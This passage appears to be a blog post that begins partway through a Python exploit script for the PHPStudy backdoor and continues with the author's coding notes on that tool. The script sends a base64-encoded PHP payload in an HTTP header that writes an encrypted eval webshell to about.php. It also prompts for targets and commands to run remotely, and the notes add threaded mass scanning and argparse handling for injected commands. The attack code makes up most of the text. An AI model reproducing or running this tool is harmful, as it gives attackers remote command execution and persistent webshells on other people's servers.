        headers['Accept-Charset'] = 'ZmlsZV9wdXRfY29udGVudHMoJy4vUEhQVHV0b3JpYWwvV1dXL2Fib3V0LnBocCcsICc8P3BocApAZXJyb3JfcmVwb3J0aW5nKDApOwpzZXNzaW9uX3N0YXJ0KCk7CmlmIChpc3NldCgkX0dFVFsicGFzcyJdKSkKewogICAgJGtleT1zdWJzdHIobWQ1KHVuaXFpZChyYW5kKCkpKSwxNik7CiAgICAkX1NFU1NJT05bImsiXT0ka2V5OwogICAgcHJpbnQgJGtleTsKfQplbHNlCnsKICAgICRrZXk9JF9TRVNTSU9OWyJrIl07CgkkcG9zdD1maWxlX2dldF9jb250ZW50cygicGhwOi8vaW5wdXQiKTsKCWlmKCFleHRlbnNpb25fbG9hZGVkKCJvcGVuc3NsIikpCgl7CgkJJHQ9ImJhc2U2NF8iLiJkZWNvZGUiOwoJCSRwb3N0PSR0KCRwb3N0LiIiKTsKCQkKCQlmb3IoJGk9MDskaTxzdHJsZW4oJHBvc3QpOyRpKyspIHsKICAgIAkJCSAkcG9zdFskaV0gPSAkcG9zdFskaV1eJGtleVskaSsxJjE1XTsgCiAgICAJCQl9Cgl9CgllbHNlCgl7CgkJJHBvc3Q9b3BlbnNzbF9kZWNyeXB0KCRwb3N0LCAiQUVTMTI4IiwgJGtleSk7Cgl9CiAgICAkYXJyPWV4cGxvZGUoInwiLCRwb3N0KTsKICAgICRmdW5jPSRhcnJbMF07CiAgICAkcGFyYW1zPSRhcnJbMV07CgljbGFzcyBDe3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgkcCkge2V2YWwoJHAuIiIpO319CglAbmV3IEMoJHBhcmFtcyk7Cn0KPz4nKTs='
        try:
            response = requests.get(self._url, headers=headers, timeout=TIME_OUT)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0], self._url.split('/')[2]))
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}\n'.format(e))

    def upload_shell_2016(self):
        headers = {}
        headers['User-Agent'] = random.choice(USER_AGENTS)
        headers['Accept-Encoding'] = 'gzip,deflate'
        # base64 payload not reproduced on this page
        headers['Accept-Charset'] = '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'
        try:
            response = requests.get(self._url, headers=headers, timeout=TIME_OUT)
            response.encoding = 'gbk'
            if response.status_code == 200:
                print('[+] Upload Successful.')
                print('[+] The webshell is {}//{}/about.php'.format(self._url.split('/')[0], self._url.split('/')[2]))
            else:
                print('[-] Looks Like Something Wrong. Maybe target is NOT vulnerable.')
        except Exception as e:
            print('[-] Looks Like Something Wrong: {}\n'.format(e))


def main():
    x = phpstudy_backdoor_getshell('', '')
    try:
        while True:
            url = input("Target url:\n")
            # Accept either scheme; a bare ('http://' or 'https://') expression
            # evaluates to 'http://' and would never test for https.
            if not url.startswith(('http://', 'https://')):
                print('[-] Please input target url with http or https')
            else:
                print('[-] Checking Target...')
                x.url = url
                if x.check_Target():
                    cmd = input("Input Your Command:\n")
                    command = base64.b64encode(cmd.encode('utf-8'))
                    x.command = command
                    x.exploit()
                    print('[-] upload a Behinder webshell')
                    target = input('Please choose the version for phpstudy [2018/2016]\n')
                    if target == '2018':
                        x.upload_shell_2018()
                    elif target == '2016':
                        x.upload_shell_2016()
                    else:
                        print('[-] some error!')
    except KeyboardInterrupt:
        sys.exit()

if __name__ == '__main__':
    main()
```

Vulnerability reproduction and uploading a shell via PHP

PHP file writing

PHPStudy backdoor vulnerability reproduction

Coding notes

A record of a few things I had forgotten, in no particular order.

Disabling HTTPS warnings

```python
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
```

Using a thread pool

```python
def main():
    files = input('please input the files:\n')
    try:
        with open(files, 'r') as f:
            lines = f.read().splitlines()  # read the file into a list, one target per line
        print(lines)
        task_pool = threadpool.ThreadPool(10)
        # Named reqs rather than requests so the HTTP module is not shadowed.
        reqs = threadpool.makeRequests(check, lines)
        for req in reqs:
            task_pool.putRequest(req)
        task_pool.wait()
    except KeyboardInterrupt:
        sys.exit()
```

Automatic encoding detection when parsing a requests response

With automatic encoding detection, requests.text sometimes comes out garbled; the simpler approach is to set the encoding explicitly when parsing the response.

```python
result.encoding = 'gbk'
```

Advanced object-oriented usage (classes)

For safety and robustness, private attributes are not exposed directly; they are marked as private by a leading underscore and accessed through decorators (property getters and setters), and the class inherits from object so that it can be used in more advanced ways.

```python
class phpstudy_backdoor_getshell(object):
    def __init__(self, url, command):
        self._url = url
        self._command = command

    # Accessors - getter() methods
    @property
    def url(self):
        return self._url

    @property
    def command(self):
        return self._command

    # Mutators - setter() methods
    @url.setter
    def url(self, url):
        self._url = url

    @command.setter
    def command(self, command):
        self._command = command
```


The constructor takes parameters, so instantiation needs them too (a brain slip); I could not be bothered to change it, so I pass two empty arguments when instantiating and set the real values later through the setters.


```python
def main():
    x = phpstudy_backdoor_getshell('', '')  # empty arguments
    try:
        while True:
            url = input("Target url:\n")
            # Accept either scheme; a bare ('http://' or 'https://') expression
            # evaluates to 'http://' and would never test for https.
            if not url.startswith(('http://', 'https://')):
                print('[-] Please input target url with http or https')
            else:
                print('[-] Checking Target...')
                x.url = url  # the real value goes in through the setter
                if x.check_Target():
                    cmd = input("Input Your Command:\n")
                    command = base64.b64encode(cmd.encode('utf-8'))
                    x.command = command
                    x.exploit()
                    print('[-] upload a Behinder webshell')
                    target = input('Please choose the version for phpstudy [2018/2016]\n')
                    if target == '2018':
                        x.upload_shell_2018()
                    elif target == '2016':
                        x.upload_shell_2016()
                    else:
                        print('[-] some error!')
    except KeyboardInterrupt:
        sys.exit()
```

Parameter parsing with argparse

Define the description and usage. To stop characters such as backslashes in the command from being escaped when the tool is invoked, single and double quotes are combined to avoid the escaping, which is a little clumsy.

```python
parse = argparse.ArgumentParser(description='EXP for phpstudy_backdoor.')
parse.usage = """phpstudy_backdoor_getshell.py [-h] [-u URL] [-c ...]

example: python3 phpstudy_backdoor_getshell.py -u http://192.168.1.103/index.php -c 'system(\\"whoami\\");'

使用反斜杠和单双引号防止转义的问题,并解决argparse下以空格解析参数不能当做一个字符串的问题
"""
```




When defining the argument, more than one value may follow it, especially when running system commands, so for convenience the number of following values is not limited (nargs=argparse.REMAINDER); when parsing, the following values (split on spaces) are joined back into a single string.

```python
parse.add_argument('-c', '--command', nargs=argparse.REMAINDER, help='Please input the exploit command')

if args.url and args.command:
    commands = ''
    for cmd in args.command:
        commands += cmd + ' '
    command = base64.b64encode(commands.encode('utf-8'))
    x.url = args.url
    x.command = command
    x.exploit()
```

Mainly some details I could not remember clearly, noted here for reference.

Code location

GitHub link

References

https://yzddmr6.tk/posts/phpstudy-backdoor/

https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp